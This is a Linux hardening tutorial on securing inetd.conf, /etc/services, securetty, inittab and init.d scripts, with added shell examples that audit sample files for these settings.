3) Services that are not needed should be disabled, and it is better still to uninstall them, so that hackers have fewer chances to attack the system. Check the "/etc/inetd.conf" file to see what services inetd provides. Comment out any unnecessary service (add the # sign at the beginning of its line), and then send a SIGHUP signal to the inetd process:

1) Change the permissions of the file to 600.

[root@deep]# chmod 600 /etc/inetd.conf

2) Make sure the owner of the file is root.

[root@deep]# stat /etc/inetd.conf

3) Edit the "inetd.conf" file (vi /etc/inetd.conf) and disable all unnecessary services, such as ftp, telnet, shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, and more. If you find some services useful, don't disable them.

4) After changing the "inetd.conf" file, don't forget to send a SIGHUP signal (killall -HUP inetd) to the inetd process.

[root@deep /root]# killall -HUP inetd

5) To protect the "inetd.conf" file, you can use the chattr command to make it immutable. To make the file immutable, just use the following command:

[root@deep]# chattr +i /etc/inetd.conf

6) A file with the "i" attribute cannot be changed: it cannot be deleted or renamed, no link can be created to it, and no data can be written to it. Only the system administrator can set and clear this attribute. If you want to change the inetd.conf file, you must first clear the flag that prevents changes:

[root@deep]# chattr -i /etc/inetd.conf

7) Services such as sendmail, named and www are different from finger, telnet and similar services: the inet daemon does not start a process for them when a request comes in; instead, they run as daemons from system startup. For Red Hat Linux, a linuxconfig command is provided, which can be used to interactively set whether to run related services at startup through the graphical interface. You can also use commands to set whether to start a service at startup, such as: [root@deep]# chkconfig --level 35 named off.
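The inetd.conf steps above can be checked after the fact with a short audit. This is an added example, not part of the original post: the function names and the sample file are constructed for illustration, and the service list is the one named in step 3.

```shell
#!/bin/sh
# Added example: audit an inetd.conf-format file against the steps above.
# RISKY is the list of services the page names in step 3.
RISKY="ftp telnet shell login exec talk ntalk imap pop-2 pop-3 finger auth"

# Write a constructed sample file (not taken from a real host) to path $1.
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample in inetd.conf format
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
#telnet stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
time    stream  tcp  nowait  root    internal
EOF
}

# Print every service still enabled: field 1 of non-blank, non-comment lines.
enabled_services() {
    awk '!/^[ \t]*(#|$)/ { print $1 }' "$1"
}

# Print enabled services that are on the page's list.
risky_enabled() {
    for svc in $(enabled_services "$1"); do
        case " $RISKY " in *" $svc "*) echo "$svc" ;; esac
    done
}

# Permission string (e.g. -rw-------) and numeric owner of a file.
file_mode() { ls -ldn "$1" | cut -c1-10; }
owner_uid() { ls -ldn "$1" | awk '{ print $3 }'; }

# Succeed only if the file is mode 600 and owned by uid 0 (steps 1 and 2).
perms_ok() {
    [ "$(file_mode "$1")" = "-rw-------" ] && [ "$(owner_uid "$1")" = "0" ]
}

# Demo on the constructed sample.
demo=$(mktemp)
write_sample "$demo"
chmod 600 "$demo"
echo "enabled: $(enabled_services "$demo" | tr '\n' ' ')"
echo "comment out: $(risky_enabled "$demo" | tr '\n' ' ')"
if perms_ok "$demo"; then echo "perms ok"; else
    echo "perms: $(file_mode "$demo") uid $(owner_uid "$demo")"; fi
rm -f "$demo"
```

On a real host, pass /etc/inetd.conf to the functions instead of the sample path; an empty result from risky_enabled means every service on the list is commented out.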

/etc/hosts.allow file

Written by UndercOde

🦑 PART 5-FINAL Speed Optimization - Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de

1) In the /etc directory, there are two files: hosts.deny and hosts.allow. By configuring these two files, you can specify which machines can use these services and which cannot.

/etc/services file

2) The correspondence between port numbers and standard services is defined in detail in RFC 1700 "Assigned Numbers". The "/etc/services" file enables server and client programs to convert a service name into a port number.

3) This table exists on each host and its file name is "/etc/services". Only the "root" user has permission to modify this file, and under normal circumstances it is not necessary to modify it, because it already contains the port numbers corresponding to commonly used services. For added security, we can protect this file from unauthorized deletion and alteration. To protect this file, you can use the following command:

[root@deep]# chattr +i /etc/services



/etc/securetty file

The "/etc/securetty" file allows you to specify which TTY devices the "root" user can log in from. The login program (usually "/bin/login") reads the "/etc/securetty" file. Its format is: all listed tty devices are allowed for root login. Any device that is commented out or does not appear in this file cannot be used to log in as root.

/etc/inittab file

4) Commenting out a line in the file can prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.

Edit the inittab file (vi /etc/inittab) and change this line:

ca::ctrlaltdel:/sbin/shutdown -t3 -r now

to:

#ca::ctrlaltdel:/sbin/shutdown -t3 -r now

5) Use the following command to make the changes take effect:

[root@deep]# /sbin/init q



/etc/rc.d/init.d/

The scripts under /etc/rc.d/init.d/ are mainly the programs that start services. There is no need for the average user to know the contents of these script files, so you should change their permissions.

[root@deep]# chmod -R 700 /etc/rc.d/init.d/*



6) Only root can read, write, and execute scripts in this directory.
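The /etc/inittab, /etc/securetty and init.d steps above can be verified the same way. This is an added example, not part of the original post: the function names and the fixture tree are constructed for illustration.

```shell
#!/bin/sh
# Added example: checks for the /etc/inittab, /etc/securetty and init.d steps.

# Print any ctrlaltdel entry that is still active (not commented out).
# inittab fields are id:runlevels:action:process.
ctrlaltdel_active() {
    awk -F: '!/^[ \t]*#/ && $3 == "ctrlaltdel"' "$1"
}

# Print the TTY devices root may log in from (uncommented securetty lines).
root_ttys() {
    awk '!/^[ \t]*(#|$)/ { print $1 }' "$1"
}

# Print scripts in a directory that group or others can still access;
# the page's chmod 700 leaves all six of those permission bits clear.
loose_scripts() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        case "$(ls -ldn "$f" | cut -c5-10)" in
            ------) ;;
            *) echo "${f##*/}" ;;
        esac
    done
}

# Build a constructed fixture tree (not a real host) under directory $1.
make_fixture() {
    mkdir -p "$1/init.d"
    printf '%s\n' 'id:3:initdefault:' \
        'ca::ctrlaltdel:/sbin/shutdown -t3 -r now' > "$1/inittab"
    printf '%s\n' 'tty1' '#tty2' 'tty3' > "$1/securetty"
    : > "$1/init.d/network"; chmod 700 "$1/init.d/network"
    : > "$1/init.d/named";   chmod 755 "$1/init.d/named"
}

# Demo on the constructed fixture.
fx=$(mktemp -d)
make_fixture "$fx"
echo "active ctrlaltdel: $(ctrlaltdel_active "$fx/inittab")"
echo "root ttys: $(root_ttys "$fx/securetty" | tr '\n' ' ')"
echo "scripts to tighten: $(loose_scripts "$fx/init.d" | tr '\n' ' ')"
rm -rf "$fx"
```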



Written by UndercOde